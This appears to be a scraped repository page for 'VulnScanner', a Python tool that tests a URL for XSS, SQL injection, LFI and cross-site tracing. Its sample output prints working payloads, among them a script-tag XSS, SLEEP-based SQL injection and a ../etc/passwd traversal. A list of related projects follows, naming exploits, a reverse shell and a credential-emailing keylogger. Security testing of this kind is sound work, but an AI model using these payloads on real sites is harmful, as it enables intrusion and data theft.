Vuln Scanner With Python

Overview

VulnScanner

Code

Version Language GitHub Repo stars


Features

Web Application Firewall (WAF) detection.

Cross Site Scripting (XSS) tests.

SQL injection time based test.

SQL injection error based test.

Local File Inclusion (LFI) test.

Cross Site Tracing (XST) test.


How To Run

git clone https://github.com/NullS0UL/VulnScanner

cd VulnScanner

python3 vulnscan.py http://example.com/page.php?cat=1

Example of Output

python3 vulnscan.py http://example.com/page.php?cat=1

[*] No WAF Detected.

Target: http://example.com/page.php?cat=1

Powered: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1

[!] Testing Cross Site Scripting (XSS)
[!] 10 Payloads.
[+] 9 Payloads were found.

[*] Payload found!
[!] Payload: <script>alert("inject")</script>
[!] POC: http://example.com/page.php?cat=<script>alert("inject")</script>

[*] Payload found!
[!] Payload: %3Cscript%3Ealert%28%22inject%22%29%3C%2Fscript%3E
[!] POC: http://example.com/page.php?cat=%3Cscript%3Ealert%28%22inject%22%29%3C%2Fscript%3E

[!] Testing SQLInjection
[*] Blind SQL injection time based found!
[!] Payload: 1-SLEEP(2)
[!] POC: http://example.com/page.php?cat=1-SLEEP(2)

[*] SQL Error found.
[!] Payload: '
[!] POC: http://example.com/page.php?cat='

[!] Testing Local File Inclussion (LFI)
[*] Payload found!
[!] Payload: ../../../../etc/passwd
[!] POC: http://example.com/page.php?cat=../../../../etc/passwd


[!] Testing Cross Site Tracing (XST)
[*] This site seems vulnerable to Cross Site Tracing (XST)!


Discaimer

Usage of the VulnScanner for attack targets without prior mutual consent is illegal. 
It is the end user's responsability to obey all applicable local, state, federal and international laws. 
Developer assume no liability and not responsible for any misuse or damage caused by this program.

Find me on

Facebook Telegram

Visit my Blog Site

  • Blogs
  • Owner
    < / N u l l S 0 U L >
    Use your brain , Make GOOGLE your friend ๐Ÿ˜˜
    < / N u l l S 0 U L >
    The probability of having the password you want in the PassMaker is +90%!!

    PasswordMaker Strong listing password Introduction The probability of having the password you want in the tool is +90%!! How to Install Open the termi

    MasterBurnt 4 Sep 05, 2021
    Tinyman exploit finder - Tinyman exploit finder for python

    tinyman_exploit_finder There was a big tinyman exploit. You can read about it he

    fish.exe 9 Dec 27, 2022
    Monty Hall Problem simulation written in Python.

    Monty Hall Problem Simulation monty_hall_sim is a brute-force method of determining the optimal strategy for the Monty Hall Problem. Usage Set boolean

    Xavier D 1 Aug 29, 2022
    EMBArk - The firmware security scanning environment

    Embark is being developed to provide the firmware security analyzer emba as a containerized service and to ease accessibility to emba regardless of system and operating system.

    emba 175 Dec 14, 2022
    Nmap automated port scanner written in Python

    port-scanner Nmap automated port scanner written in Python. USE: Clone the module Import the module: from portscanModule import portscanner Use: ports

    Brayden Karnes 1 Dec 03, 2021
    log4j2 dos exploit,CVE-2021-45105 exploit,Denial of Service poc

    ่ฏดๆ˜Ž about author: ๆˆ‘่ถ…ๆ€•็š„ blog: https://www.cnblogs.com/iAmSoScArEd/ github: https://github.com/iAmSOScArEd/ date: 2021-12-20 log4j2 dos exploit log4j2 do

    3 Aug 13, 2022
    Deltaspy - an advanced keylogger that can send keylogs and screenshots to gmail

    Deltaspy Deltaspy is a advanced keylogger which sends keylogs and screenshot to

    Praanesh S 1 Dec 31, 2021
    Log4j2 intranet scan

    Log4j2-intranet-scan โš ๏ธ ๅ…่ดฃๅฃฐๆ˜Ž ๆœฌ้กน็›ฎไป…้ขๅ‘ๅˆๆณ•ๆŽˆๆƒ็š„ไผไธšๅฎ‰ๅ…จๅปบ่ฎพ่กŒไธบ๏ผŒๅœจไฝฟ็”จๆœฌ้กน็›ฎ่ฟ›่กŒๆฃ€ๆต‹ๆ—ถ๏ผŒๆ‚จๅบ”็กฎไฟ่ฏฅ่กŒไธบ็ฌฆๅˆๅฝ“ๅœฐ็š„ๆณ•ๅพ‹ๆณ•่ง„๏ผŒๅนถไธ”ๅทฒ็ปๅ–ๅพ—ไบ†่ถณๅคŸ็š„ๆŽˆๆƒ ๅฆ‚ๆ‚จๅœจไฝฟ็”จๆœฌ้กน็›ฎ็š„่ฟ‡็จ‹ไธญๅญ˜ๅœจไปปไฝ•้žๆณ•่กŒไธบ๏ผŒๆ‚จ้œ€่‡ช่กŒๆ‰ฟๆ‹…็›ธๅบ”ๅŽๆžœ๏ผŒๆˆ‘ไปฌๅฐ†ไธๆ‰ฟๆ‹…ไปปไฝ•ๆณ•ๅพ‹ๅŠ่ฟžๅธฆ่ดฃไปป ๅœจไฝฟ็”จๆœฌ้กน็›ฎๅ‰๏ผŒ่ฏทๆ‚จๅŠก

    k3rwin 16 Dec 19, 2022
    ๐ŸŽป Modularized exploit generation framework

    Modularized exploit generation framework for x86_64 binaries Overview This project is still at early stage of development, so you might want to come b

    แด€แด‡๊œฑแดแด˜สœแดส€ 30 Jan 17, 2022
    Delta Sharing: An Open Protocol for Secure Data Sharing

    Delta Sharing: An Open Protocol for Secure Data Sharing Delta Sharing is an open protocol for secure real-time exchange of large datasets, which enabl

    Delta Lake 497 Jan 02, 2023
    Description Basic Recon tool for beginners. Especially those who faces issue on how to recon or what all tools to use

    Description Basic Recon tool for beginners. Especially those who faces issue on how to recon or what all tools to use. Will try to add atleast 10 more tools currently use 7 sources to gather domains.

    Harinder Singh 7 Jan 03, 2022
    Tools to make working the Arch Linux Security Tracker easier

    This is a collection of Python scripts to make working with the Arch Linux Security Tracker easier.

    Jonas Witschel 6 Jul 13, 2022
    Dahua IPC/VTH/VTO devices auth bypass exploit

    CVE-2021-33044 Dahua IPC/VTH/VTO devices auth bypass exploit About: The identity authentication bypass vulnerability found in some Dahua products duri

    Ashish Kunwar 23 Dec 02, 2022
    Ethereum transaction decoder (community version).

    EthTx Community Edition Community version of EthTx transaction decoder Local environment For local instance, you need few things: Depending on your di

    240 Dec 21, 2022
    ๐™พ๐š™๐šŽ๐š— ๐š‚๐š˜๐šž๐š›๐šŒ๐šŽ ๐š‚๐šŒ๐š›๐š’๐š™๐š - ๐™ฝ๐š˜ ๐™ฒ๐š˜๐š™๐šข๐š›๐š’๐š๐š‘๐š - ๐šƒ๐šŽ๐šŠ๐š– ๐š†๐š˜๐š›๐š” - ๐š‚๐š’๐š–๐š™๐š•๐šŽ ๐™ฟ๐šข๐š๐š‘๐š˜๐š— ๐™ฟ๐š›๐š˜๐š“๐šŽ๐šŒ๐š - ๐™ฒ๐š›๐šŽ๐šŠ๐š๐šŽ๐š ๐™ฑ๐šข : ๐™ฐ๐š•๐š• ๐šƒ๐šŽ๐šŠ๐š– - ๐™ฒ๐š˜๐š™๐šข๐™ฟ๐šŠ๐šœ๐š ๐™ฒ๐šŠ๐š— ๐™ฝ๐š˜๐š ๐™ผ๐šŠ๐š”๐šŽ ๐šˆ๐š˜๐šž ๐š๐šŽ๐šŠ๐š• ๐™ฟ๐š›๐š˜๐š๐š›๐šŠ๐š–๐š–๐šŽ๐š›

    ๐™พ๐š™๐šŽ๐š— ๐š‚๐š˜๐šž๐š›๐šŒ๐šŽ ๐š‚๐šŒ๐š›๐š’๐š™๐š - ๐™ฝ๐š˜ ๐™ฒ๐š˜๐š™๐šข๐š›๐š’๐š๐š‘๐š - ๐šƒ๐šŽ๐šŠ๐š– ๐š†๐š˜๐š›๐š” - ๐š‚๐š’๐š–๐š™๐š•๐šŽ ๐™ฟ๐šข๐š๐š‘๐š˜๐š— ๐™ฟ๐š›๐š˜๐š“๐šŽ๐šŒ๐š - ๐™ฒ๐š›๐šŽ๐šŠ๐š๐šŽ๐š ๐™ฑ๐šข : ๐™ฐ๐š•๐š• ๐šƒ๐šŽ๐šŠ๐š– - ๐™ฒ๐š˜๐š™๐šข๐™ฟ๐šŠ๐šœ๐š ๐™ฒ๐šŠ๐š— ๐™ฝ๐š˜๐š ๐™ผ๐šŠ๐š”๐šŽ ๐šˆ๐š˜๐šž ๐š๐šŽ๐šŠ๐š• ๐™ฟ๐š›๐š˜๐š๐š›๐šŠ๐š–๐š–๐šŽ๐š›

    CodeX-ID 2 Oct 27, 2022
    This is simple python FTP password craker. To crack FTP login using wordlist based brute force attack

    This is simple python FTP password craker. To crack FTP login using wordlist based brute force attack

    Varun Jagtap 5 Oct 08, 2022
    Add a Web Server based on Rogue Mysql Server to allow remote user get

    ไป‹็ป ๅฏนไบŽ้œ€่ฆไฝฟ็”จ Rogue Mysql Server ็š„ๆผๆดžๆฅ่ฏด๏ผŒ่‹ฅๆƒณๆ‰น้‡ๆฃ€ๆต‹่ฟ™็งๆผๆดž็š„่ฏ้œ€่ฆ่‡ชๅค‡ไธ€ไธชๆœๅŠกๅ™จใ€‚ๅนถไธ”ๆˆ‘ๅธธ็”จ็š„Rogue Mysql Server ่„šๆœฌ ไธๆ”ฏๆŒๅŠจๆ€ๆ›ดๆ”น่ฏปๅ–ๆ–‡ไปถๅใ€ไธๆ”ฏๆŒ่ฟœ็จ‹็”จๆˆท่ฎฟ้—ฎ่ฏปๅ–็ป“ๆžœใ€ไธๆ”ฏๆŒๆ‰น้‡ๅŒ–ๆฃ€ๆต‹็ฝ‘็ซ™ใ€‚ไบŽๆ˜ฏไนŽ่Œ็”Ÿไบ†่ฟ™ไธชๅฐ่„šๆœฌ็š„ๆƒณๆณ• Rogue-MySql-

    6 May 17, 2022
    Proof of concept for CVE-2021-31166, a remote HTTP.sys use-after-free triggered remotely.

    CVE-2021-31166: HTTP Protocol Stack Remote Code Execution Vulnerability This is a proof of concept for CVE-2021-31166 ("HTTP Protocol Stack Remote Cod

    Axel Souchet 820 Dec 18, 2022
    Log4j2 CVE-2021-44228 revshell

    Log4j2-CVE-2021-44228-revshell Usage For reverse shell: $~ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [At

    FaisalFs 16 Mar 24, 2022
    It's a simple tool for test vulnerability shellshock

    Shellshock, also known as Bashdoor, is a family of security bugs in the Unix Bash shell, the first of which was disclosed on 24 September 2014. Shellshock could enable an attacker to cause Bash to ex

    Mr. Cl0wn - H4ck1ng C0d3r 88 Dec 23, 2022